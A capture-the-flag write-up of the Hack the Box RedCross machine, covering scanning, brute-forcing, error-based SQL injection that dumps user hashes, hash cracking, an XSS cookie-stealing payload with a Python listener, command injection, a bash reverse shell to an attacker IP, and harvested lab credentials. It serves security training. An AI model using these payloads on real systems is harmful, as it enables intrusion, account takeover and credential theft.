redcross.md

Hack the Box - RedCross

Machine IP: 10.10.10.113 - Debian

Reconnaissance

Discover all open TCP ports (a SYN scan needs raw sockets, hence sudo)

sudo nmap -Pn -sS -p- 10.10.10.113 -T4 --min-rate 1000 -oN nmap.surface

Identify and scan running services on open ports

sudo nmap -sV -sC -p 22,80,443 10.10.10.113 -oN nmap.deep 

Application Mapping

image


Directory Brute-Force

gobuster dir --url https://intra.redcross.htb --wordlist /usr/share/wordlists/directories.txt --no-tls-validation --threads 25 --output intra-dir.out

image

Directory Brute-Force: /pages (common PHP filenames)

gobuster dir --url https://intra.redcross.htb/pages --wordlist Common-PHP-Filenames.txt --no-tls-validation --threads 25 --output intra-dir-pages.out

image

Directory Brute-Force: /documentation (pdf and txt extensions, separate output file so the previous results are not overwritten)

gobuster dir --url https://intra.redcross.htb/documentation --wordlist directory-list-2.3-small.txt --no-tls-validation --threads 25 --output intra-dir-documentation.out --extensions pdf,txt

image


Virtual Host Brute-Force

Fuzz the Host header against the IP; --hw 28 hides responses with the word count of the default (non-matching) vhost response, so only hosts that serve different content are shown.

wfuzz -H 'Host: FUZZ.redcross.htb' -u 'https://10.10.10.113' -w subdomains-top1million-5000.txt --hw 28

image


Testing for SQL Injection (login form)

  • URL: https://intra.redcross.htb/?page=login
  • Capture the request in Burp Suite and save it to a text file (Copy to file).
  • Run sqlmap against the captured request. image image

SQLMap

sqlmap -r login-request.txt --force-ssl --dbms mysql --batch

Result: no injectable parameter found in the login request.


Testing for Default Credentials on Login Page

  • Working credentials: guest:guest.
  • Logged in as guest. image

Testing for SQL Injection (user-id filter)

  • URL: https://intra.redcross.htb/?page=app
  • Capture the request in Burp Suite and save it to a text file (Copy to file).
  • Run sqlmap against the captured request, targeting the o parameter. image

SQLMap

sqlmap -r userid-filter-request.txt -p o --force-ssl --dbms mysql --batch

Manual Testing

  • Append a ' to the o parameter and observe the database error in the response: the value lands inside a quoted, parenthesised expression. image
  • Error-based extraction: extractvalue() raises an XPATH syntax error that echoes its second argument, so whatever is concatenated after the 0x0a newline leaks through the error message. ') closes the original string and bracket; -- - comments out the rest of the query.
  • Extract: Version information.
  • Query: ') and extractvalue(0x0a,concat(0x0a,version()))-- - image

Database Name

  • Extract: Database name (LIMIT 1,1 skips the first schema, normally information_schema).
  • Query: ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)))-- - image

Tables

  • Extract: Table names in the database redcross.
  • Query (Table 1): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 0,1)))-- - image
  • Query (Table 2): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 1,1)))-- - image
  • Query (Table 3): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 2,1)))-- - image
  • Tables Found: messages, requests and users.

Columns

  • Extract: Column names in the table users (offsets 0 to 4; filtering on TABLE_NAME alone would also match a users table in another schema, so add TABLE_SCHEMA like "redcross" if the results look wrong).
  • Query (Column 1): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 0,1)))-- - image
  • Query (Column 2): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 1,1)))-- - image
  • Query (Column 3): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 2,1)))-- - image
  • Query (Column 4): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 3,1)))-- - image
  • Query (Column 5): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 4,1)))-- - image
  • Columns Found: id, username, password, mail and role.

Usernames and Passwords

  • Extract: Usernames (one row per request, stepping the LIMIT offset).
  • Query (User 1): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 0,1)))-- - image
  • Query (User 2): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 1,1)))-- - image
  • Query (User 3): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 2,1)))-- - image
  • Query (User 4): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 3,1)))-- - image
  • Query (User 5): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 4,1)))-- -
  • Users Found: admin, penelope, charles, tricia and guest.

Passwords

  • Extract: Password hashes.
  • Query: ') and extractvalue(0x0a,concat(0x0a,(select password from redcross.users LIMIT 0,1)))-- - image
  • The above query returned the hash for admin, but truncated. The XPATH syntax error raised by extractvalue() shows at most 32 characters of the offending value, and the leading 0x0a uses one of them, so each request leaks 31 characters. A bcrypt hash is 60 characters long, so wrap the subquery in substring(... FROM 32) to fetch the remainder and concatenate the two fragments.
  • Query 1 (admin, part 1): ') and extractvalue(0x0a,concat(0x0a,(select password from redcross.users LIMIT 0,1)))-- - image
  • Query 2 (admin, part 2): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 0,1) FROM 32)))-- - image
  • Combining both: $2y$10$z/d5GiwZuFqjY1jRiKIPzuPX + Kt0SthLOyU438ajqRBtrb7ZADpwq. = $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq. (60 characters, as every bcrypt hash must be; dropping the PX at the seam gives an invalid hash that hashcat will reject)
  • Hash (admin): $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.
  • Query 3 (penelope, part 1): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 1,1) FROM 1)))-- - image
  • Query 4 (penelope, part 2): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 1,1) FROM 32)))-- - image
  • Combining both: $2y$10$tY9Y955kyFB37GnW4xrC0.J. + FzmkrQhxD..vKCQICvwOEgwfxqgAS = $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
  • Hash (penelope): $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
  • Query 5 (charles, part 1): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 2,1) FROM 1)))-- - image
  • Query 6 (charles, part 2): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 2,1) FROM 32)))-- - image
  • Hash (charles): $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
  • Query 7 (tricia, part 1): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 3,1) FROM 1)))-- - image
  • Query 8 (tricia, part 2): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 3,1) FROM 32)))-- - image
  • Hash (tricia): $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.
  • Query 9 (guest, part 1): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 4,1) FROM 1)))-- - image
  • Query 10 (guest, part 2): ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 4,1) FROM 32)))-- - image
  • Hash (guest): $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi
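The two-request dance above is worth automating, because the offset arithmetic is exactly where hand transcription goes wrong. The script below is an added example and not part of the original writeup: build_payload() produces injection strings of the same shape as the queries above, and dump_value() keeps requesting substring(... FROM offset) until a fragment comes back shorter than 31 characters. The database and the error text are a constructed stand-in that mimics MySQL's 32-character XPATH error truncation; against the real target you would replace fake_mysql_error() with a function that sends the payload in the o parameter and returns the response body.

```python
"""Chunked extraction through extractvalue()'s truncated XPATH error.

Added example, not code from the writeup. MySQL shows at most 32
characters of the offending XPath string; the 0x0a separator that keeps
the payload well-formed takes one of them, so each request leaks 31
characters. Values longer than that (a 60-character bcrypt hash) are
fetched with SUBSTRING at offsets 1, 32, 63, ... and concatenated.
"""
import re

VISIBLE = 32                 # characters MySQL shows in the XPATH error
PAYLOAD_CHARS = VISIBLE - 1  # minus the leading 0x0a newline


def build_payload(expr: str, offset: int = 1) -> str:
    """Injection string for the o parameter, same shape as the page's queries."""
    return (f"') and extractvalue(0x0a,concat(0x0a,"
            f"substring(({expr}) FROM {offset})))-- -")


# Constructed stand-in for the target database (values taken from the writeup).
FAKE_DB = {
    "select username from redcross.users LIMIT 0,1": "admin",
    "select password from redcross.users LIMIT 0,1":
        "$2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.",
}


def fake_mysql_error(payload: str) -> str:
    """Model the error the app echoes: value cut to VISIBLE characters.

    SQL SUBSTRING is 1-indexed, hence offset - 1 when slicing in Python.
    """
    m = re.search(r"substring\(\((.+?)\) FROM (\d+)\)", payload)
    expr, offset = m.group(1), int(m.group(2))
    value = FAKE_DB[expr][offset - 1:]
    shown = ("\n" + value)[:VISIBLE]
    return f"XPATH syntax error: '{shown}'"


def parse_fragment(error_text: str) -> str:
    """Pull the leaked fragment (everything after the newline) out of the error."""
    m = re.search(r"XPATH syntax error: '\n(.*)'", error_text, re.S)
    return m.group(1) if m else ""


def dump_value(expr: str, send=fake_mysql_error) -> str:
    """Stitch fragments until a request returns fewer than 31 characters.

    A value whose length is an exact multiple of 31 yields one final empty
    fragment, which also terminates the loop.
    """
    result, offset = "", 1
    while True:
        fragment = parse_fragment(send(build_payload(expr, offset)))
        result += fragment
        if len(fragment) < PAYLOAD_CHARS:
            return result
        offset += PAYLOAD_CHARS  # next request starts where this one was cut


if __name__ == "__main__":
    for expr in FAKE_DB:
        print(f"{expr}\n  -> {dump_value(expr)}")
```

The first request for the admin hash returns $2y$10$z/d5GiwZuFqjY1jRiKIPzuPX (31 characters) and the second, at offset 32, returns the remaining 29; a wrong second offset (30, say) duplicates two characters at the seam, which is why checking the final length against 60 is a cheap sanity test before spending GPU time on bcrypt.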

Crack Hashes

hashcat -m 3200 --username hashes.txt /usr/share/wordlists/rockyou.txt

  • hashes.txt holds one user:hash line per account; --username makes hashcat strip the prefix and report each result with its user. image
  • Mode 3200 is bcrypt; at cost factor 10 this is slow, so a single wordlist is tried.
  • Cracked password: cookiemonster for user charles.


Application Testing

  • Directory brute-force showed this file is accessible: https://intra.redcross.htb/documentation/account-signup.pdf image
  • Found link: https://intra.redcross.htb/?page=contact image
  • Fill in and submit the contact form, adding an extra parameter named password to the request. image image
  • With the password parameter present, the response returned the credentials guest:guest.

Testing for XSS

  • Goal: steal the session cookie of whoever reads the submitted messages.
  • Test every field in the form.
  • Payload (quoting fixed; the victim's cookie is sent in the query string of an image request to the attacker's host):
<script>document.write('<img src="http://10.10.14.34/nothing.gif?cookie=' + document.cookie + '"/>')</script> image image
  • Session-Cookie received: 9cvn6v8fh74bv8h6bql20dlt27, sent from the admin vhost. Since document.cookie could read it, the cookie is not flagged HttpOnly.
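Something has to answer the nothing.gif request and record what arrives. The listener below is an added example, not part of the original writeup: it is the attacker-side half of the payload above, written for the 10.10.14.34 host the page uses. The cookie name PHPSESSID (PHP's default) and the sample request in the comments are assumptions, not data observed on the target.

```python
"""Catch the cookie exfiltrated by the XSS payload.

Added example, not code from the writeup. Serves any GET, logs the
'cookie' query parameter, and replies with an image content type so the
victim's page shows nothing unusual. The cookie name PHPSESSID in the
docstrings is assumed (PHP default), not taken from the target.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

CAPTURED: List[str] = []   # every cookie value received, in order


def extract_cookie(path: str) -> Optional[str]:
    """Return the 'cookie' query value from a request path, or None.

    parse_qs splits each pair on the first '=' only, so a request for
    /nothing.gif?cookie=PHPSESSID=abc (constructed sample) keeps the
    inner '=' that document.cookie produces.
    """
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    values = qs.get("cookie")
    return values[0] if values else None


class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie is not None:
            CAPTURED.append(cookie)
            print(f"[+] {self.client_address[0]} -> {cookie}")
        # Image content type and a tiny body: the <img> simply fails to render.
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")

    def log_message(self, *args):
        """Silence the default access log; the print above is enough."""


if __name__ == "__main__":
    # Port 80 matches the payload URL; needs root or a capability to bind.
    HTTPServer(("0.0.0.0", 80), CookieCatcher).serve_forever()
```

Because the cookie rides in a URL, anything with a copy of the admin's browser or proxy logs also sees it; HttpOnly on the session cookie would have stopped this particular exfiltration, though not XSS itself.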

Vhost Application

image

  • Replace our session cookie with the stolen value.
  • Access to the Admin Panel. image
  • Add User: create an account through the panel. image image
  • Creds: random:UxNCeFVf
  • SSH: the new credentials allow login. However, nothing of interest was found on the host from this account. image
  • Network Firewall: whitelisted the attacker IP, which exposes further services to us (see the scan below).

NMAP (After Whitelisting IP)

nmap -sC -sV 10.10.10.113 -oN nmap.whitelist

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 01:54 IST
Nmap scan report for redcross.htb (10.10.10.113)
Host is up (0.089s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.8 or later
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey: 
|   2048 67d385f8eeb8062359d7758ea237d0a6 (RSA)
|   256 89b465271f93721abce3227090db3596 (ECDSA)
|_  256 66bda11c327432e2e664e8a5251b4d67 (ED25519)
80/tcp   open  http        Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_http-server-header: Apache/2.4.25 (Debian)
443/tcp  open  ssl/http    Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after:  2021-02-27T19:46:58
|_http-server-header: Apache/2.4.25 (Debian)
1025/tcp open  NFS-or-IIS?
5432/tcp open  postgresql  PostgreSQL DB 9.6.7 - 9.6.12
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=redcross.redcross.htb
| Subject Alternative Name: DNS:redcross.redcross.htb
| Not valid before: 2018-06-03T19:13:20
|_Not valid after:  2028-05-31T19:13:20
Service Info: Host: RedCross; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.51 seconds

Command Injection

image

Injection

  • Blind test: start tcpdump on tun0, then submit a value through the firewall form that makes the target ping the attacker host.
tcpdump -i tun0 icmp

image

  • ICMP echo request received from the target machine: the submitted value reaches a shell. image
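The ICMP test proves the input reaches a shell, but not why. The snippet below is an added illustration and not the target's code, which the writeup does not show: it assumes the admin panel turns the submitted IP into an iptables command (the command itself is hypothetical) and puts the injectable version next to a hardened one. Commands are recorded rather than executed so it runs offline; pass run=subprocess.run to execute for real.

```python
"""Vulnerable and hardened versions of an IP whitelist handler.

Added illustration, not the target's source. The iptables command is a
hypothetical stand-in for whatever the admin panel runs; the bug class
is the one the ICMP test confirms: untrusted input reaches a shell.
"""
import ipaddress
import subprocess  # real deployments pass run=subprocess.run
from typing import Callable, List, Union

# Illustrative attacker input in the style of the blind ping test above.
PING_BACK = "10.10.14.34; ping -c 1 10.10.14.34"

EXECUTED: List[Union[str, List[str]]] = []


def record(cmd, **kwargs):
    """Stand-in for subprocess.run that only logs what would be executed."""
    EXECUTED.append(cmd)


def whitelist_vulnerable(ip: str, run: Callable = record) -> str:
    """String building + shell=True: ';', '|' or '$()' in ip start new commands."""
    cmd = f"iptables -I INPUT -s {ip} -j ACCEPT"   # hypothetical command
    run(cmd, shell=True)
    return cmd


def is_safe_ip(ip: str) -> bool:
    """True only for a literal IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(ip.strip())
        return True
    except ValueError:
        return False


def whitelist_hardened(ip: str, run: Callable = record) -> List[str]:
    """Validate first, then pass an argv list with shell=False.

    Even if validation were bypassed, argv execution never hands the value
    to a shell, so metacharacters stay inside a single argument.
    """
    if not is_safe_ip(ip):
        raise ValueError(f"rejected: {ip!r} is not an IP address")
    clean = str(ipaddress.ip_address(ip.strip()))
    argv = ["iptables", "-I", "INPUT", "-s", clean, "-j", "ACCEPT"]
    run(argv, shell=False)
    return argv


if __name__ == "__main__":
    print(whitelist_vulnerable(PING_BACK))   # the shell would run the ping
    print(whitelist_hardened("10.10.14.34"))
    try:
        whitelist_hardened(PING_BACK)
    except ValueError as exc:
        print(exc)
```

Validation with ipaddress rejects the payload outright, and the argv form is the defence that holds even when validation has a gap; the same two rules apply to the reverse-shell payload in the next step, which is just a longer string after the same separator.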

Reverse Shell

Reverse Shell Payload (with a listener waiting on 10.10.14.34:9001): bash -c 'bash -i >& /dev/tcp/10.10.14.34/9001 0>&1' image image


Information Gathering (database credentials found on the host)

image

  • DB User: unixusrmgr:dheu%7wjx8B&

image

  • DB User: dbcross:LOSPxnme4f5pH5wp